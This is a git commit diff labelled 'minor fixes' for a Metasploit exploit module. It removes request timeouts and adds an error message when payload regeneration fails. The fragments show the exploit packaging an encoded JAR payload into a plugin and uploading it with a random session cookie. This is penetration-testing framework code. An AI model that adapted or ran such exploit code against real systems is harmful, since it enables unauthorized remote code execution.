minor fixes
parent
38abeeb235
commit
73360dfae3
|
@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
res = send_request_cgi(
|
||||
{
|
||||
'uri' => path
|
||||
}, 20)
|
||||
})
|
||||
|
||||
if (not res) or (res.code != 200)
|
||||
print_error("Failed: Error requesting #{path}")
|
||||
|
@ -116,7 +116,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
res = send_request_cgi(
|
||||
{
|
||||
'uri' => path
|
||||
}, 20)
|
||||
})
|
||||
|
||||
if (not res) or (res.code != 200)
|
||||
print_error("Failed: Error requesting #{path}")
|
||||
|
@ -161,7 +161,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
arch = target.arch
|
||||
plat = [Msf::Module::PlatformList.new(target['Platform']).platforms[0]]
|
||||
|
||||
return if ((p = exploit_regenerate_payload(plat, arch)) == nil)
|
||||
if (p = exploit_regenerate_payload(plat, arch)) == nil
|
||||
print_error("Failed to regenerate payload")
|
||||
return
|
||||
end
|
||||
|
||||
plugin.add_file("lib/#{rand_text_alphanumeric(8)}.jar", payload.encoded_jar.pack)
|
||||
plugin.build_manifest
|
||||
|
@ -185,7 +188,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Content-Length' => data.length,
|
||||
'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}",
|
||||
}
|
||||
}, 5)
|
||||
})
|
||||
|
||||
|
||||
print_error("Warning: got no response from the upload, continuing...") if !res
|
||||
|
|
Loading…
Reference in New Issue